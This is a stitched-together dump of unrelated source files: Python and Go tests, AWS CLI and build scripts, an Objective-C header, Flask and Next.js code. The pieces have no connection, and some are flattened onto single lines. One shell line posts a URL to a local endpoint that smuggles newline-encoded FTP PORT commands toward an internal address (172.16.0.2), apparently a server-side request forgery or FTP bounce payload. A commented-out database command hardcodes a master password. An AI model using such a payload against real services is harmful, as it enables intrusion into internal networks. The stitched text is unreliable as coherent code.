    # A tag attached to the `post` fixture via a TagMark.
    tag = Tag.create(created_date=datetime.datetime.now(), title=u"тэг",)
    TagMark.create(tag=tag, post=post)

    # Close the connection so the app under test can reopen it cleanly.
    from src.model import db

    db.db_wrapper.database.close()
    return tag


@pytest.fixture
def tag_no_post():
    # A tag with no associated post.
    tag = Tag.create(created_date=datetime.datetime.now(), title=u"тэг",)

    from src.model import db

    db.db_wrapper.database.close()
    return tag


def test_tags(client, tag):
    # Listing endpoint returns the one attached tag with pagination metadata.
    rv = client.get("/tags/")
    assert rv.json["success"] == 1
    assert len(rv.json["tags"]) == 1, "We should have only one tag"
    assert rv.json["tags"][0]["title"] == tag.title, "Wrong title"
    assert rv.json["meta"]["page_count"] == 1, "There should be one page"


def test_tags_no_post(client, tag_no_post):
    # A tag is listed even when it marks no post.
    rv = client.get("/tags/")
    assert rv.json["success"] == 1
    assert len(rv.json["tags"]) == 1, "We should have only one tag"
    assert rv.json["tags"][0]["title"] == tag_no_post.title, "Wrong title"
    assert rv.json["meta"]["page_count"] == 1, "There should be one page"


def test_no_tags(client):
    # Empty database yields an empty list and zero pages.
    rv = client.get("/tags/")
    assert rv.json["success"] == 1
    assert len(rv.json["tags"]) == 0, "We should have no tags"
    assert rv.json["meta"]["page_count"] == 0, "There should be no pages"


def test_tag(client, tag, post):
    # The per-tag endpoint lists the posts carrying that tag.
    rv = client.get("/tags/" + tag.title + "/")
    assert rv.json["success"] == 1
    assert len(rv.json["posts"]) == 1, "We should have only one post"
    assert rv.json["posts"][0]["title"] == post.title, "Wrong title"
    assert rv.json["meta"]["page_count"] == 1, "There should be one page"


def test_suggestions(client, tag):
    # Prefix suggestion matches the stored tag; a non-matching prefix returns nothing.
    rv = client.post("/tags/suggestion/", json={"title": u"тэ"})
    assert rv.json["success"] == 1
    assert len(rv.json["tags"]) == 1, "We should have only one tag"
    assert rv.json["tags"][0]["title"] == tag.title, "Wrong title"

    rv = client.post("/tags/suggestion/", json={"title": "ta"})
    assert rv.json["success"] == 1
    assert len(rv.json["tags"]) == 0, "We should have no tags"
import pandas as pd
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split

# Load the dataset: every column but the last is a feature, the last is the target.
data = pd.read_csv('dataset.csv')
X = data.iloc[:, :-1]
y = data.iloc[:, -1]

# Hold out 20% of the rows for evaluation; fixed seed for reproducibility.
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)

# create the model and fit it with the training data
regressor = LinearRegression()
regressor.fit(X_train, y_train)

# evaluate the model with test data
# BUG FIX: LinearRegression.score() returns R^2 (coefficient of determination),
# not classification accuracy — the old "Accuracy ...%" label was misleading.
score = regressor.score(X_test, y_test)
print('R^2 score of model:', score)
export * from './buffer-geometry.directive';
# Testing a simple EC2 launch without autoscaling.
# Args: 1=AMI id, 2=count, 3=instance type, 4=security group ids,
#       5=subnet id, 6=key name, 7=IAM instance profile name.
# BUG FIX: positional parameters were unquoted and would word-split.
aws ec2 run-instances --image-id "$1" --count "$2" --instance-type "$3" \
  --security-group-ids "$4" --subnet-id "$5" --key-name "$6" \
  --associate-public-ip-address --iam-instance-profile Name="$7" \
  --user-data file://install-webserver.sh --debug

#testing database connection
#aws rds create-db-instance --db-name simmoncatdb --db-instance-identifier simmon-the-cat-db --db-instance-class db.t1.micro --engine mysql --master-username LN1878 --master-user-password hesaysmeow --allocated-storage 5
#wait
#echo -e "\nPlease wait for a few minute, creating database : simmoncatdb . . ."
#aws rds wait db-instance-available --db-instance-identifier simmon-the-cat-db
#echo -e "\n Finished creating the database."
<reponame>premss79/zignaly-webapp export { default } from "./ConfirmTwoFADisableForm";
<gh_stars>0
// Auto-generated Doxygen symbol index for InputOutputTensorNames.cpp.
// Each entry maps a BOOST_FIXTURE_TEST_CASE to its anchor in the XHTML docs.
// Do not edit by hand; regenerate with Doxygen.
var _input_output_tensor_names_8cpp =
[
    [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#adbada061eaef5ccd88559389007bc45b", null ],
    [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#a141fb364180f4a3b7b31b1cd33d162ab", null ],
    [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#aa4e3edcaa4db14810764452fcc4d61b0", null ],
    [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#ac5dca292cc3d652bf21ea3acc6361e67", null ],
    [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#a694ee3f9f1226a0a9b65d223cdd89429", null ],
    [ "BOOST_FIXTURE_TEST_CASE", "_input_output_tensor_names_8cpp.xhtml#a0e8ed45dd35ce63037318f7a501e51bf", null ]
];
#!/bin/bash
# Copyright © 2021 Pittsburgh Supercomputing Center.
# All Rights Reserved.

# Build the ncdu Singularity image remotely and report success only if the
# image file exists afterwards.
IMAGE=singularity-ncdu-1.13.sif
DEFINITION=Singularity

# Remove any stale image so the existence check below reflects this build.
if [ -f "$IMAGE" ]; then
    rm -fv "$IMAGE"
fi

singularity build --remote "$IMAGE" "$DEFINITION"

# Exit status mirrors whether the build actually produced the image.
if [ -f "$IMAGE" ]; then
    exit 0
else
    exit 1
fi
#!/usr/bin/env sh
# Build OpenSSL 1.1.1d as WebAssembly (WASI) static libraries plus the
# openssl command-line tool.
# Based on code from https://github.com/TrueBitFoundation/wasm-ports/blob/master/openssl.sh

OPENSSL_VERSION=1.1.1d
PREFIX=`pwd`
DIRECTORY="openssl-${OPENSSL_VERSION}"

# Fetch and unpack the sources only once.
if [ ! -d "$DIRECTORY" ]; then
  echo "Download source code"
  curl https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz -o openssl-${OPENSSL_VERSION}.tar.gz
  tar xf openssl-${OPENSSL_VERSION}.tar.gz
fi

# Hard-link the local patch tree over the pristine sources.
cd patch-${OPENSSL_VERSION}
find . -type f | cpio -pvduml ../openssl-${OPENSSL_VERSION}
cd ../openssl-${OPENSSL_VERSION}

echo "Configure"
make clean
# Disable features unavailable under WASI (sockets, fork, asm, AF_ALG).
wasiconfigure ./Configure gcc -no-tests -no-asm -static -no-sock -no-afalgeng -DOPENSSL_SYS_NETWARE -DSIG_DFL=0 -DSIG_IGN=0 -DHAVE_FORK=0 -DOPENSSL_NO_AFALGENG=1 --with-rand-seed=getrandom || exit $?
# Link the WASI mman emulation library into the generated Makefile.
sed -i -e "s/CNF_EX_LIBS=/CNF_EX_LIBS=-lwasi-emulated-mman /g" Makefile
make apps/progs.h
# The wasi wrappers supply the toolchain; drop any cross-compile prefix.
sed -i 's|^CROSS_COMPILE.*$|CROSS_COMPILE=|g' Makefile

echo "Build"
wasimake make -j12 build_generated libssl.a libcrypto.a apps/openssl

# Install headers and copy the resulting wasm binary next to the prefix.
rm -rf ${PREFIX}/include
mkdir -p ${PREFIX}/include
cp -R include/openssl ${PREFIX}/include
cp -R apps/openssl.wasm ../openssl.wasm

# echo "Generate libraries .wasm files"
# wasicc libcrypto.a -o ${PREFIX}/libcrypto.wasm
# wasicc libssl.a -o ${PREFIX}/libssl.wasm

# echo "Link"
# wasicc apps/*.o libssl.a libcrypto.a \
#     -o ${PREFIX}/openssl.wasm
# chmod +x ${PREFIX}/openssl.wasm || exit $?

echo "Done"
package iterator_test

import (
	"errors"
	"testing"

	. "github.com/rotationalio/honu/iterator"
	"github.com/rotationalio/honu/options"
	"github.com/stretchr/testify/require"
)

// TestEmptyIterator verifies the no-op iterator's contract: inert accessors,
// the released-then-Next error transition, and preservation of a seeded error
// across all method calls including Release.
func TestEmptyIterator(t *testing.T) {
	// Check that the empty iterator returns expected values
	iter := NewEmptyIterator(nil, "")
	require.False(t, iter.Next())
	require.False(t, iter.Prev())
	require.False(t, iter.Seek([]byte("foo")))
	require.Nil(t, iter.Key())
	require.Nil(t, iter.Value())
	require.NoError(t, iter.Error())
	// An empty namespace falls back to the default namespace.
	require.Equal(t, options.NamespaceDefault, iter.Namespace())

	obj, err := iter.Object()
	require.NoError(t, err)
	require.Nil(t, obj)

	// After calling release the empty iterator should still have no error
	iter.Release()
	require.NoError(t, iter.Error())

	// However if next is called after release, then the iterator should error
	require.False(t, iter.Next())
	require.EqualError(t, iter.Error(), ErrIterReleased.Error())

	// Check that the empty iterator can be initialized with an error
	iter = NewEmptyIterator(errors.New("something bad happened"), "foo")
	require.EqualError(t, iter.Error(), "something bad happened")

	// Ensure that calling any of the iterator methods do not change the error
	require.False(t, iter.Next())
	require.False(t, iter.Prev())
	require.False(t, iter.Seek([]byte("foo")))
	require.Nil(t, iter.Key())
	require.Nil(t, iter.Value())
	require.Equal(t, "foo", iter.Namespace())

	obj, err = iter.Object()
	require.NoError(t, err)
	require.Nil(t, obj)
	require.EqualError(t, iter.Error(), "something bad happened")

	// Ensure calling Release doesn't change the error
	iter.Release()
	require.EqualError(t, iter.Error(), "something bad happened")

	// Ensure calling Next after Release doesn't change the error
	iter.Next()
	require.EqualError(t, iter.Error(), "something bad happened")
}
"""
Functions to load embeddings.
"""
import codecs
import io
import pickle

import numpy as np


def load_embedding(fname, number_tokens=5000):
    """Load monolingual word embeddings from a fastText-style text file.

    The first line (the "<vocab-size> <dimension>" header) is skipped and
    words are lowercased.

    Args:
        fname: Path to the monolingual embedding file.
        number_tokens: Stop after reading this many tokens.

    Returns:
        tuple: (list of embedded words as strings, float32 numpy array of
        their vectors).
    """
    words = []
    vectors = []
    # BUG FIX: the original never closed the file handle; use a context manager.
    with io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore') as fin:
        for index, line in enumerate(fin):
            if index == 0:
                continue  # header line
            tokens = line.rstrip().split(' ')
            words.append(tokens[0].lower())
            vectors.append(tokens[1:])
            if index == number_tokens:
                break
    # BUG FIX: the original returned float32 when the cutoff was reached but a
    # string-dtype array when the file was shorter; always return float32.
    return words, np.array(vectors).astype("float32")


def load_translation_dict(dict_path):
    """Load a translation dictionary from a .tsv or .txt file.

    Args:
        dict_path: Path to the translation dictionary.

    Returns:
        tuple: (list of source words, list of target words), both lowercased.
    """
    translation_source = []
    translation_target = []
    file_type = dict_path.split(".")[-1]
    if file_type == "tsv":
        # Tab-separated: one "source<TAB>target" pair per line.
        with codecs.open(dict_path, "r", encoding='utf8', errors='replace') as tsv_file:
            for line in tsv_file.readlines():
                line = line.strip().split("\t")
                translation_source.append(line[0].lower())
                translation_target.append(line[1].lower())
    elif file_type == "txt":
        # Space-separated: "source target" per line; collapse repeated spaces.
        with open(dict_path) as file_in:
            for line in file_in:
                line = line.rstrip("\n")
                line = ' '.join(line.split())
                [src, trg] = line.split(" ")
                translation_source.append(src.lower())
                translation_target.append(trg.lower())
    else:
        print("No supported dictionary file type")
    return translation_source, translation_target


def save_clew(clew_method, name):
    """Pickle a cross-lingual word embedding model's matrices and vocabularies.

    Args:
        clew_method: Cross-lingual word embedding object exposing
            proj_embedding_source_target, target_embedding_matrix,
            src_word2ind and trg_word2ind.
        name: Filename prefix for the four pickle files.
    """
    with open(name + '_src_emb.pkl', 'wb') as f:
        pickle.dump(clew_method.proj_embedding_source_target, f)
    with open(name + '_trg_emb.pkl', 'wb') as f:
        pickle.dump(clew_method.target_embedding_matrix, f)
    with open(name + '_src_word.pkl', 'wb') as f:
        pickle.dump(clew_method.src_word2ind, f)
    with open(name + '_trg_word.pkl', 'wb') as f:
        pickle.dump(clew_method.trg_word2ind, f)
//
//  TTBaseRequest.h
//  TT
//
//  Created by 张福润 on 2017/3/11.
//  Copyright © 2017年 张福润. All rights reserved.
//
//  Base class for all network requests: request construction, dispatch,
//  success/cancel/failure callbacks, and response parsing hooks.

#import <Foundation/Foundation.h>
#import "TTBaseReqCommon.h"

@class UIImage;
@class TTBaseRequest;

// Default error code used when a request fails without a server-supplied code.
extern const NSInteger REQUEST_DEFAULT_ERROR_CODE;
// Key under which a parsed model object is stored in resultDict (see -processResult).
extern NSString * const Key_Model;

@interface TTBaseRequest : NSObject

// Full URL of the request.
@property (nonatomic, copy, readonly) NSString *requestUrl;
// Non-binary request parameters.
@property (nonatomic, strong, readonly) NSDictionary *requestParameters;
// Binary payloads attached to the request (TTBinaryData objects).
@property (nonatomic, strong, readonly) NSMutableArray *binaryParameterArray;
// Parsed response, dictionary form.
@property (nonatomic, strong, readonly) NSMutableDictionary *resultDict;
// Parsed response, array form.
@property (nonatomic, strong, readonly) NSMutableArray *resultArray;
// Raw response as a string.
@property (nonatomic, copy) NSString *resultString;
// Response decoded as an image, when applicable.
@property (nonatomic, strong, readonly) UIImage *responseImage;
// Whether the request finished successfully.
@property (nonatomic, assign, readonly) BOOL isSuccess;

#pragma mark - Class Methods

/**
 Plain data request.

 @param parameters   Request parameters: parameter name + value (non-binary)
 @param successBlock Called on success
 @param cancelBlock  Called when the request is cancelled
 @param failureBlock Called on failure
 */
+ (void)requestParameters:(NSDictionary *)parameters successBlock:(reqSuccessBlock)successBlock cancelBlock:(reqCancelBlock)cancelBlock failureBlock:(reqFailureBlock)failureBlock;

/**
 Upload request carrying binary data.

 NOTE(review): the selector fragment "uplodProcessBlock" is misspelled
 ("upload"); renaming it would break existing callers, so it is kept as-is.

 @param parameters         Parameters required by the server-side API
 @param binaryArray        Binary payloads (wrapped TTBinaryData objects)
 @param successBlock       Called on success
 @param cancelBlock        Called when the request is cancelled
 @param failureBlock       Called on failure
 @param uploadProcessBlock Upload-progress callback
 */
+ (void)requestParameters:(NSDictionary *)parameters binaryArray:(NSMutableArray *)binaryArray successBlock:(reqSuccessBlock)successBlock cancelBlock:(reqCancelBlock)cancelBlock failureBlock:(reqFailureBlock)failureBlock uplodProcessBlock:(reqUploadBlock)uploadProcessBlock;

/**
 Returns the URL this request targets.
 */
- (NSString *)getRequestUrl;

/**
 Whether a request is currently in flight.
 e.g. mainly used to avoid duplicate data requests.
 */
+ (BOOL)isRequesting;

/**
 Start network reachability monitoring.
 PS: call this once at app launch to begin monitoring network status.
 NOTE(review): "starNetWorkReachability" is missing the 't' in "start";
 kept as-is because renaming would break callers.
 */
+ (void)starNetWorkReachability;

/**
 Current network reachability status.
 */
+ (TTNetworkReachabilityStatus)fetchReachabilityStatus;

#pragma mark - Children Class
// Override points for subclasses. A request URL can be understood as:
// root host + per-feature path + parameters.

/**
 Request host (root address prefix).
 The root of every request in the project,
 e.g. http://<ip>:<port>/<root-folder>/
 */
- (NSString *)getRequestHost;

/**
 Request query (per-feature path segment).
 Backend endpoints are grouped by feature; override this to return the
 path segment for the current request's feature group.
 */
- (NSString *)getRequestQuery;

/**
 Value for the "User-Agent" request header.
 Mainly system-dependent.
 */
- (NSString *)getUserAgent;

/**
 Custom request headers.
 PS: typically used for request encryption or temporary headers added at
 some stage, distinct from the company-wide base headers.
 */
- (NSDictionary<NSString *, NSString *> *)getCustomHeaders;

/**
 Request timeout. Defaults to 60.0 seconds.

 @return Timeout interval
 */
- (NSTimeInterval)getTimeoutInterval;

/**
 HTTP method for this request.
 PS: override per concrete request. Of the four common methods the default
 is GET, so GET requests need no override.
 */
- (TTRequestMethod)getRequestMethod;

/**
 Default (base) parameters merged into every request.
 e.g. the server may need the user's current network type, the OS the app
 runs on, and so on. These base parameters are kept as an NSMutableDictionary
 and merged with the per-request parameters before sending.
 */
- (NSDictionary *)getDefaultParameters;

/**
 Response processing hook — the important part.
 e.g. when fetching user data, read the payload from self.resultDict,
 convert it to a model (MJExtension or similar), and store the model back
 into self.resultDict under Key_Model so the success callback can read it.
 */
- (void)processResult;

/**
 Cancel this class's in-flight requests.
 Intended for TTBaseViewController's cancelAllRequest: call this for every
 pending request when the current page is torn down.
 */
+ (void)cancelTheRequest;

/**
 Whether the response payload itself reports success.
 e.g. an HTTP-successful request may still carry a server-side error; the
 server usually returns an agreed error code, handled per use case.
 */
- (BOOL)success;

/**
 Status/result code of the request.
 */
- (NSInteger)statusCode;

/**
 Failure message from the response.
 */
- (NSString *)msg;

/**
 Total record count for this endpoint.
 e.g. used for paginated loading — total number of records the endpoint can
 return; agree on the exact semantics with the backend.
 */
- (NSInteger)totalCount;

/**
 Whether more pages remain.
 Combined with totalCount above to decide whether further pages should be
 loaded. Suggestion: have the server return a Status block (name arbitrary)
 with paginated responses and parse it uniformly on the client.
 */
- (BOOL)hasMoreData;

@end
<reponame>turoDog/LearningPython import requests from pyquery import PyQuery as pq url = 'https://www.zhihu.com/explore' headers = { 'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ' '(KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' } html = requests.get(url, headers=headers).text doc = pq(html) items = doc('.explore-tab .feed-item').items() for item in items: question = item.find('h2').text() author = item.find('.author-link-line').text() answer = pq(item.find('.content').html()).text() file = open('explore.txt','a', encoding='utf-8') file.write('\n'.join([question, author, answer])) file.write('\n' + '=' * 50 + '\n') file.close()
<filename>service/batch/doc.go<gh_stars>1000+ // Code generated by private/model/cli/gen-api/main.go. DO NOT EDIT. // Package batch provides the client and types for making API // requests to AWS Batch. // // Using Batch, you can run batch computing workloads on the Cloud. Batch computing // is a common means for developers, scientists, and engineers to access large // amounts of compute resources. Batch uses the advantages of this computing // workload to remove the undifferentiated heavy lifting of configuring and // managing required infrastructure. At the same time, it also adopts a familiar // batch computing software approach. Given these advantages, Batch can help // you to efficiently provision resources in response to jobs submitted, thus // effectively helping you to eliminate capacity constraints, reduce compute // costs, and deliver your results more quickly. // // As a fully managed service, Batch can run batch computing workloads of any // scale. Batch automatically provisions compute resources and optimizes workload // distribution based on the quantity and scale of your specific workloads. // With Batch, there's no need to install or manage batch computing software. // This means that you can focus your time and energy on analyzing results and // solving your specific problems. // // See https://docs.aws.amazon.com/goto/WebAPI/batch-2016-08-10 for more information on this service. // // See batch package documentation for more information. // https://docs.aws.amazon.com/sdk-for-go/api/service/batch/ // // Using the Client // // To contact AWS Batch with the SDK use the New function to create // a new service client. With that client you can make API requests to the service. // These clients are safe to use concurrently. // // See the SDK's documentation for more information on how to use the SDK. // https://docs.aws.amazon.com/sdk-for-go/api/ // // See aws.Config documentation for more information on configuring SDK clients. 
// https://docs.aws.amazon.com/sdk-for-go/api/aws/#Config // // See the AWS Batch client Batch for more // information on creating client for this service. // https://docs.aws.amazon.com/sdk-for-go/api/service/batch/#New package batch
<gh_stars>0 #!/usr/bin/env python """ This module includes Money class which is a subclass of the Item class. Purpose of the module to learn how to use inheritance and polymorphizm in the python. Its free to use and change. writen by <NAME>. 16.06.2015 """ from Item import Item # # # object # # class Money(Item): """ subclass Money derived from Item superclass purpose of the Money class: to learn inheritance and polymorphizm in python """ def __init__(self): super(Money, self).__init__() Money._worth = 1 self._name = 'money' # # object property # def name(): doc = "The name property, keeps name of the Item and can't be changed" def fget(self): return self._name return locals() name = property(**name()) # # object static method # @staticmethod def setWorth(): """this medhot not much usefull""" Money._worth = 1
<reponame>sambhavdutt/fabric-test2<gh_stars>1-10 // Code generated by protoc-gen-go. // source: data.proto // DO NOT EDIT! /* Package main is a generated protocol buffer package. It is generated from these files: data.proto It has these top-level messages: PermissionedBlob */ package main import proto "github.com/golang/protobuf/proto" import fmt "fmt" import math "math" // Reference imports to suppress errors if they are not otherwise used. var _ = proto.Marshal var _ = fmt.Errorf var _ = math.Inf // This is a compile-time assertion to ensure that this generated file // is compatible with the proto package it is being compiled against. // A compilation error at this line likely means your copy of the // proto package needs to be updated. const _ = proto.ProtoPackageIsVersion2 // please upgrade the proto package type PermissionedBlob struct { Owner []byte `protobuf:"bytes,1,opt,name=Owner,proto3" json:"Owner,omitempty"` Blob []byte `protobuf:"bytes,2,opt,name=Blob,proto3" json:"Blob,omitempty"` } func (m *PermissionedBlob) Reset() { *m = PermissionedBlob{} } func (m *PermissionedBlob) String() string { return proto.CompactTextString(m) } func (*PermissionedBlob) ProtoMessage() {} func (*PermissionedBlob) Descriptor() ([]byte, []int) { return fileDescriptor0, []int{0} } func init() { proto.RegisterType((*PermissionedBlob)(nil), "main.PermissionedBlob") } func init() { proto.RegisterFile("data.proto", fileDescriptor0) } var fileDescriptor0 = []byte{ // 96 bytes of a gzipped FileDescriptorProto 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x4a, 0x49, 0x2c, 0x49, 0xd4, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x17, 0x62, 0xc9, 0x4d, 0xcc, 0xcc, 0x53, 0xb2, 0xe1, 0x12, 0x08, 0x48, 0x2d, 0xca, 0xcd, 0x2c, 0x2e, 0xce, 0xcc, 0xcf, 0x4b, 0x4d, 0x71, 0xca, 0xc9, 0x4f, 0x12, 0x12, 0xe1, 0x62, 0xf5, 0x2f, 0xcf, 0x4b, 0x2d, 0x92, 0x60, 0x54, 0x60, 0xd4, 0xe0, 0x09, 0x82, 0x70, 0x84, 0x84, 0xb8, 0x58, 0x40, 0xb2, 0x12, 0x4c, 0x60, 0x41, 0x30, 0x3b, 0x89, 0x0d, 
0x6c, 0x94, 0x31, 0x20, 0x00, 0x00, 0xff, 0xff, 0x0a, 0xe0, 0xd3, 0xcf, 0x58, 0x00, 0x00, 0x00, }
#set( $symbol_pound = '#' ) #set( $symbol_dollar = '$' ) #set( $symbol_escape = '\' ) package ${package}; import com.google.inject.Guice; import com.google.inject.Injector; import cucumber.api.guice.CucumberModules; import cucumber.runtime.java.guice.InjectorSource; public class CucumberInjectorSource implements InjectorSource { @Override public Injector getInjector() { return Guice.createInjector(CucumberModules.SCENARIO, new GuiceModule()); } }
//============================================================================ // Copyright 2009-2020 ECMWF. // This software is licensed under the terms of the Apache Licence version 2.0 // which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. // In applying this licence, ECMWF does not waive the privileges and immunities // granted to it by virtue of its status as an intergovernmental organisation // nor does it submit to any jurisdiction. // //============================================================================ #ifndef VIEWER_SRC_CASESENSITIVEBUTTON_HPP_ #define VIEWER_SRC_CASESENSITIVEBUTTON_HPP_ #include <QToolButton> #include <map> class CaseSensitiveButton : public QToolButton { Q_OBJECT public: explicit CaseSensitiveButton(QWidget* parent=nullptr); protected Q_SLOTS: void slotClicked(bool); Q_SIGNALS: void changed(bool); private: std::map<bool,QString> tooltip_; }; #endif /* VIEWER_SRC_CASESENSITIVEBUTTON_HPP_ */
#!/bin/bash set -xe scriptDir=$(cd $(dirname $0) && pwd) if [ "$TRAVIS_OS_NAME" = "osx" ]; then export PATH=/usr/local/opt/python/libexec/bin:$PATH fi $scriptDir/install_deps.sh if [ "$TRAVIS_OS_NAME" = "linux" ]; then # Xvfb needs to be running during testing and packaging /sbin/start-stop-daemon --start --quiet --pidfile /tmp/custom_xvfb_99.pid --make-pidfile \ --background --exec /usr/bin/Xvfb -- :99 -ac -screen 0 1280x1024x16 fi $scriptDir/build_and_test.sh export LD_LIBRARY_PATH=$TRAVIS_BUILD_DIR/build/install/lib $scriptDir/docs_and_package.sh
error_exit() { msg="$1" echo "" echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" echo $1 echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" exit 1 }
package com.solvd.booking.reservation; public class InvalidCardNumberException extends Exception{ }
<filename>javafx-src/com/sun/webkit/dom/CommentImpl.java /* * Copyright (c) 2013, 2017, Oracle and/or its affiliates. All rights reserved. * ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms. * * * * * * * * * * * * * * * * * * * * */ package com.sun.webkit.dom; import org.w3c.dom.Comment; public class CommentImpl extends CharacterDataImpl implements Comment { CommentImpl(long peer) { super(peer); } static Comment getImpl(long peer) { return (Comment)create(peer); } }
/**
 * Demo a private page
 *
 * @see https://github.com/VulcanJS/vulcan-next/issues/49
 * @see https://github.com/vercel/next.js/discussions/14531
 */
import Link from "next/link";
import { NextPage } from "next";
import { withPrivateAccess } from "@vulcanjs/next-utils";
//import debug from "debug";
// const debugNext = debug("vns:next");

interface PrivatePageProps {}

// Page body; only rendered once withPrivateAccess has granted access.
const PrivatePage: NextPage<PrivatePageProps> = (props) => {
  return (
    <>
      <h1>private</h1>
      <div>Seeing a private page.</div>
      <div>
        <Link href="/vn/debug/public">
          <a>Back to public page</a>
        </Link>
      </div>
    </>
  );
};

// NOTE: we use getInitialProps to demo redirect, in order to keep things consistent
// with _app, that do not support getServerSideProps and getStaticProps at the time of writing (Next 9.4)
// When redirecting in a page, you could achieve a cleaner setup using getServerSideProps (not demonstrated here)
//PrivatePage.getInitialProps = async (ctx?: NextPageContext) => {
//  return pageProps;
//};

export default withPrivateAccess({
  isAllowedClient: async (props, ctx) => {
    /**
     * @client-only
     * Your logic to check if user is allowed, client-side
     *
     * Here we use a query param, in real life you might want to check
     * the presence of a cookie or a token in the localStorage
     *
     * The function is overly complex because router.query is sometimes empty,
     * but location.search is also outdated when running getInitialProps
     * So I have to differentiate scenarios
     * It would be simpler in a normal app (just a localStorage.get call)
     */
    let isAllowed;
    if (ctx) {
      // We are in a getInitialProps call, ctx is providing infos about the URL
      // (window.location is still pointing to previous page so we can't use it)
      isAllowed = !!ctx.query.allowed; // demo
    } else {
      // We are in the component render, we can use window
      const urlParams = new URLSearchParams(window.location.search);
      isAllowed = !!urlParams.get("allowed");
    }
    return { isAllowed };
  },
  isAllowedServer: async (props, ctx) => {
    // We can do async calls here.
    // Server-side the "?allowed=..." query param alone grants access.
    const isAllowed = !!ctx.query.allowed;
    return { isAllowed };
  },
  // Where to send visitors who fail both checks.
  defaultRedirection: "/vn/debug/public",
})(PrivatePage);
/* * Copyright (C) 2016 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.common.graph; import static com.google.common.base.Preconditions.checkNotNull; import static com.google.common.graph.GraphConstants.DEFAULT_NODE_COUNT; import static com.google.common.graph.Graphs.checkNonNegative; import java.util.Iterator; import java.util.Map; import java.util.Set; import java.util.TreeMap; import javax.annotation.CheckForNull; /** * Standard implementation of {@link ValueGraph} that supports the options supplied by {@link * AbstractGraphBuilder}. * * <p>This class maintains a map of nodes to {@link GraphConnections}. * * <p>Collection-returning accessors return unmodifiable views: the view returned will reflect * changes to the graph (if the graph is mutable) but may not be modified by the user. * * <p>The time complexity of all collection-returning accessors is O(1), since views are returned. * */
<reponame>Leodma/sisAre from app import db from app.busca import buscar from app.cadastros.models import Cadastro from app.tc.models import Termo from flask import render_template, flash, request, redirect, url_for from flask_login import login_required, login_user, current_user, login_required from app.busca.forms import BuscaForm @buscar.route('/busca' , methods=['GET', 'POST']) @login_required def busca(): opcoes_cadastro = [('numero', 'Número'), ('titulo','Título'),('cpf', 'CPF'), ('modalidade', 'Modalidade')] opcoes_termo = [('titulo','titulo'),('anexo', 'anexo'), ('conteudo','conteudo')] form = BuscaForm() form.criterio_cad.choices = opcoes_cadastro form.criterio_termo.choices = opcoes_termo if request.args.get('bd'): tipo = request.args.get('bd') else: tipo = 'Cadastros' if request.method == 'POST': busca = form.busca.data if tipo == "Cadastros": criterio = form.criterio_cad.data else: criterio = form.criterio_termo.data return redirect(url_for('buscar.busca_conteudo', tipo = tipo, criterio = criterio, conteudo = busca)) return render_template('busca.html', form=form) @buscar.route('/busca/<tipo>/<criterio>/<conteudo>') @login_required def busca_conteudo(tipo, criterio, conteudo): tipo = tipo criterio = criterio conteudo = conteudo if tipo == 'Cadastros': cadastros = Cadastro.query.filter(Cadastro.__dict__.__getitem__(criterio).like(f'%{conteudo}%')).all() return render_template('lista_cadastros.html', cadastros=cadastros, titulo = f'Cadastros encontrados com: {conteudo}' ) if tipo =='Termo de Compromisso': termos = Termo.query.filter(Termo.__dict__.__getitem__(criterio).like(f'%{conteudo}%')).all() return render_template('lista_termos.html', termos=termos, titulo = f'Termos encontrados com: {conteudo}' )
#!/usr/bin/env bash set -ue set -o pipefail rm -f Cargo.lock if [[ ${MINVER:-false} = true ]]; then sed -e '/^\[dependencies\]$/,/^[.*]$/s/"\([0-9]\)/"=\1/g' < Cargo.toml.bak > Cargo.toml fi cargo build --examples --verbose cargo test --verbose cp Cargo.toml.bak Cargo.toml
curl -i -H "Content-Type: application/json" -X POST -d '{"title": "mumma", "url": "ftp://vps102.vps.31173.se:6666/%0A%0APORT%20172,16,0,2,105,137/attack.jpg"}' http://localhost:5000/wines/
def insurance_claim(replacement_cost, deductible): amount_to_be_paid = replacement_cost - deductible return amount_to_be_paid if __name__ == '__main__': replacement_cost = 10000 deductible = 500 amount_to_be_paid = insurance_claim(replacement_cost, deductible) print(amount_to_be_paid)
#!/bin/bash source ./env/common.sh redis-server --maxmemory 40mb --maxmemory-policy allkeys-lru --save "" --appendonly no --dbfilename "" & mosquitto & cd src/embedding ./start_android_aarch64.sh & cd - cd src/face_detection ./start_android_aarch64.sh & cd - cd src/detector ./start_android_aarch64.sh & cd - cd src/monitor ./start_android_aarch64.sh & cd - while [ 1 ] do flower --port=5556 --address=0.0.0.0 sleep 20 done
<reponame>ashler2/be-nc-news const cors = require("cors"); const express = require("express"); const app = express(); const { apiRouter } = require("./routers/apiRouter"); const { errorPsql400s, send404UrlError, sendCustomError, error500s } = require("./error/error"); app.use(cors()); app.use(express.json()); app.use("/api", apiRouter); app.use(errorPsql400s); app.use(sendCustomError); app.use(error500s); app.all("/*", send404UrlError); module.exports = { app };
